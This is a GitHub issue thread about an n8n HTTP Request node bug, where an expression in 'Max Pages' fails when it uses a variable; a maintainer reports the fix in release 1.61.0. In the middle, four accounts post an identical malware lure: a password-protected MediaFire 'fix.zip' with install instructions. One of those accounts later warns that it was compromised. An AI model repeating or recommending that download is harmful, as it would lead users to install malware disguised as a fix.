### ISSUE TITLE
HTTP node Max Pages expression error

### ISSUE THREAD

**Issue by NilsEle** [n8n-io/n8n#10553]
### Bug Description

When using a JS expression in the "Max Pages" parameter (in Pagination/Limit Pages Fetched) in a HTTP Request node the limit throws an error if anything else than a number is used. The expression {{ 3 }} works but any variable like {{ $json.filter.pageLimit }} does not work. Others have been experiencing the same thing:
https://community.n8n.io/t/need-some-help-with-http-request-node-pagination-using-max-pages-expression/39449
I reported a bug related to this previously and it seems like it was only partly fixed: https://github.com/n8n-io/n8n/issues/9597 . Now {{ 3 }} works but a variable does not work.
I left a comment detailing the new bug with print screens here: https://github.com/n8n-io/n8n/issues/9597#issuecomment-2308424900

### To Reproduce

- Add a HTTP Request node
- Connect to any API with pagination
- Add option/pagination
- Activate Limit Pages Fetched
- Insert a set node before the HTTP node (or any solution feeding data) and set a variable called pageLimit to 3
- Change Max Pages to expression and input {{ $json.pageLimit }} or what suits your test case
- Test the step
- An error will be thrown saying "No execution data available" even though the data is available

### Expected behavior

The expected behavior would be that an expression with {{ $json.pageLimit }} would limit the pages fetched like a Fixed 3 would in case {{ $json.pageLimit }} is 3.

### Operating System

n8n cloud

### n8n Version

1.55.3

### Node.js Version

4.2

### Database

SQLite (default)

### Execution mode

main (default)

**Comment by Joffcom** [comment]
Hey @NilsEle,

We have created an internal ticket to look into this which we will be tracking as "GHC-187"

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nxllxvxxd** [comment]
# **DO NOT DOWNLOAD ANYTHING I HAVE POSTED AS A COMMENT OR ANY OTHER MEDIAFIRE LINKS, MY ACCOUNT WAS COMPROMISED AND BEING USED TO COMPROMISE OTHERS AND YOURS WILL END UP BEING USED AS WELL**

**I AM WORKING ON DELETING AND POSTING THIS ON ALL THREADS IN WHICH THEY USED MY ACCOUNT TO POST THIS**

**Comment by janober** [comment]
Fix got released with [`n8n@1.61.0`](https://github.com/n8n-io/n8n/releases/tag/n8n%401.61.0)
